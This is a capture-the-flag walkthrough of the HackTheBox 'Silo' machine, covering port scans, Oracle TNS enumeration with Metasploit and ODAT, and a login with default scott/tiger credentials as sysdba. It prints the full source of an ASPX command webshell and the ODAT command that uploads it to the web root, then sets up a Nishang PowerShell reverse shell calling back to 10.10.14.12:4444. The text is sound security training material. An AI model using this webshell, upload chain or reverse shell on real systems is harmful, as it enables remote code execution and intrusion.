Hackthebox Silo Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:46 EST
Nmap scan report for 10.10.10.82
Host is up (0.091s latency).
Not shown: 65261 filtered ports, 269 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 121.90 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:48 EST
Nmap scan report for 10.10.10.82
Host is up (0.100s latency).
Not shown: 65268 filtered ports, 262 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.82
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:49 EST
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).
All 65535 scanned ports on 10.10.10.82 are open|filtered (65460) or closed (75)
Nmap done: 1 IP address (1 host up) scanned in 75.11 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -p 80,135,139,445,8080 -Pn -sC -sV -oN detailed.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:53 EST
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T00:53:53
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds
Vulnrability Scan Link to heading
$ sudo nmap -p 80,135,139,445,8080 -script VULN 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:54 EST
Nmap scan report for 10.10.10.82
Host is up (0.057s latency).
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
| http-enum:
|_ /i/: Potentially interesting folder
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 342.38 seconds
SMB enumeration Link to heading
It seems we may not get any information from SMB ports.
sudo nmap -p 135,139,445 -script smb-enum-shares.nse 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 20:02 EST
Nmap scan report for 10.10.10.82
Host is up (0.057s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 4.33 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -p 135,139,445 -script smb-enum-users.nse 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 20:03 EST
Nmap scan report for 10.10.10.82
Host is up (0.053s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.89 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ smbmap -H 10.10.10.82 -R
[!] Authentication error on 10.10.10.82
HTTP enumeration Link to heading
gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.82
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/23 20:11:39 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
From the Http-enumeration earlier we have found an intresting folder.
8080/tcp open http-proxy | http-enum: |_ /i/: Potentially interesting folder
I am trying one more port scan to confirm if i have not missed any. I can see more ports which i could not find in initial scan.
sudo nmap -sS -T4 -sV -sC 10.10.10.82 1 ⨯
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 06:14 EST
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 401 Unauthorized
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 14s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T11:16:31
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.34 seconds
Now you can see more services and information. I dont know how i missed this on initial scan. Always try to use manaual and some autmated scripts scan like Autorecon during the exam to make sure no ports are missed. otherwises most of the time will be gone exploiting the wrong services.
Oracle DB enumeration Link to heading
The port 1521 runs on Oracle TNS. The version number also received on nmap scan above. I could see some reference in msf console for DB enumeration:
msf6 > search TNS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_enum) > show options
Module options (auxiliary/scanner/oracle/sid_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/sid_enum) > set RHOSTS 10.10.10.82
Tried some inbuilt tool in Kali and it give some response . but no useful informtion
tnscmd10g status -h 10.10.10.82
sending (CONNECT_DATA=(COMMAND=status)) to 10.10.10.82:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))
Upto some versions(12g) I read there is TNS poision exploit which affects oracle. Ours is 11g and there are some ways to check if the version is vulnarable. We can use msf scan which is allowed in OSCP.
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/tnspoison_checker
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > set RHOSTS 10.10.10.82
RHOSTS => 10.10.10.82
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.82 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > run
[+] 10.10.10.82:1521 - 10.10.10.82:1521 is vulnerable
[*] 10.10.10.82:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It says the destination is vulnrarable.There is tool ODAT which can be installed in Kali
sudo apt install odat
[sudo] password for rocky:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
libiscsi7
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
libodpic3 oracle-instantclient-devel python3-argcomplete python3-colorlog python3-cx-oracle
Suggested packages:
libodpic-doc python-cx-oracle-doc
The following NEW packages will be installed:
libodpic3 odat oracle-instantclient-devel python3-argcomplete python3-colorlog python3-cx-oracle
0 upgraded, 6 newly installed, 0 to remove and 1657 not upgraded.
Need to get 1,026 kB of archives.
After this operation, 4,709 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
─(rocky㉿kali)-[~/tool/exp]
└─$ odat -h
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
positional arguments:
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
Download oracle client
cd odat
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:04-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28068712 (27M) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-basiclite-19.8.0. 100%[========================================================================================>] 26.77M 1.58MB/s in 29s
2022-02-24 22:21:33 (950 KB/s) - ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’ saved [28068712/28068712]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:39-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 702872 (686K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-sqlplus-19.8.0.0. 100%[========================================================================================>] 686.40K 1.17MB/s in 0.6s
2022-02-24 22:21:40 (1.17 MB/s) - ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’ saved [702872/702872]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:55-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 612416 (598K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-devel-19.8.0.0.0- 100%[========================================================================================>] 598.06K 1.22MB/s in 0.5s
2022-02-24 22:21:56 (1.22 MB/s) - ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’ saved [612416/612416]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo alien --to-deb *.rpm
[sudo] password for rocky:
sudo: alien: command not found
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo apt install alien 1 ⨯
Reading package lists... Done
Building dependency tree... Done
──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ls /usr/lib/oracle
19.6 19.8
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap
Test the access
─$ sqlplus
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:09:52 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Enter user-name
Find the Database/username/password using ODAT
$ ./odat.py sidguesser -s 10.10.10.82 2 ⨯
05:05:16 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################################################################################################## | ETA: 00:00:02
100% |#####################################################################################################################################################| Time: 00:03:51
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#####################################################################################################################################################| Time: 00:00:07
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ################################################################################################### | ETA: 00:00:21
100% |#####################################################################################################################################################| Time: 00:03:21
[+] SIDs found on the 10.10.10.82:1521 server: XE
Using the msfconsole
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show otions
[-] Invalid parameter "otions", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_brute) > show options
Module options (auxiliary/scanner/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPORT 1521 yes The target port (TCP)
SID no A specific SID to attempt.
SID_FILE /usr/share/metasploit-framework/data/wordlists/s no File containing instance names, one per line
id.txt
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/oracle/sid_brute) > set RHOSTs 10.10.10.82
RHOSTs => 10.10.10.82
We found the username/password/Database.Lets test the access
sqlplus scott/tiger@10.10.10.82:1521/XE
sqlplus scott/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:19:04 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
The user role seems limited.There is role in Oracle DB"SYSDBA" which equvalaent to “sudo”. Let’s try to assign user “scott"the additinal privilege by this command.
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:26:09 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
To see the actual privilege which scott has
$ sudo odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
[sudo] password for rocky:
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the SCOTT/tiger account
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
[2.11] External table to read files ?
[+] OK
[2.12] External table to execute system commands ?
[+] OK
[2.13] Oradbg ?
[-] KO
[2.14] DBMS_LOB to read files ?
[+] OK
[2.15] SMB authentication capture ?
[+] Perhaps (try with --capture to be sure)
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
[2.16.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.16.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[+] Impossible to know
[2.18] Create file on target (CVE-2018-3004)?
[-] KO
[2.19] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO
Refer the terms which are “OK”
If you refer the [ODAT github](odat/odat_mind_map_v1.0.jpg at master-python3 · quentinhardy/odat · GitHub) page it will show the functionalities available. Lets use these available functions to upload the file(reverse shell)
I have tied .txt and .php file upload and found .txt upload works and using the mutiple extensions upload, i could see only aspx works. However the ASPX reverse shell code using msfvenom contain large number of characters. I am using the local aspx shell from Kali.This also needs to be foramtted a little bit. The actual shell can be found here.
└─$ locate cmdasp
/home/rocky/hckbox/Bounty/cmdasp.aspx
/home/rocky/hckbox/granny/cmdasp.aspx
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmdasp.aspx
1400 cmdasp.aspx
After formating I have uploaded the [test shell ](Rchitect/cmdnew.aspx at Yoda · tcprks/Rchitect · GitHub)here.
─$ cat cmdasp.aspx | tr -d '\n'
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label></form></body></HTML><!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!-- http://michaeldaw.org 04/2007 -->
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cat cmdasp.aspx | tr -d '\n' > cmd.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmd.aspx
1358 cmd.aspx
Upload now using the command format below
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ./odat.py dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "rchitect.aspx" "/home/rocky/hckbox/silo/rchitect.aspx"
07:54:03 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Put the /home/rocky/hckbox/silo/rchitect.aspx local file in the C:\inetpub\wwwroot\ path (named rchitect.aspx) of the 10.10.10.82 server
[+] The /home/rocky/hckbox/silo/rchitect.aspx local file was put in the remote C:\inetpub\wwwroot\ path (named rchitect.aspx)
I can access the cmdshell from browser
Let’s use the Nishang’s Powershell script for reverse shell access:
$ tail -1 Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ tail -5 Invoke-PowerShellTcp.ps1
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
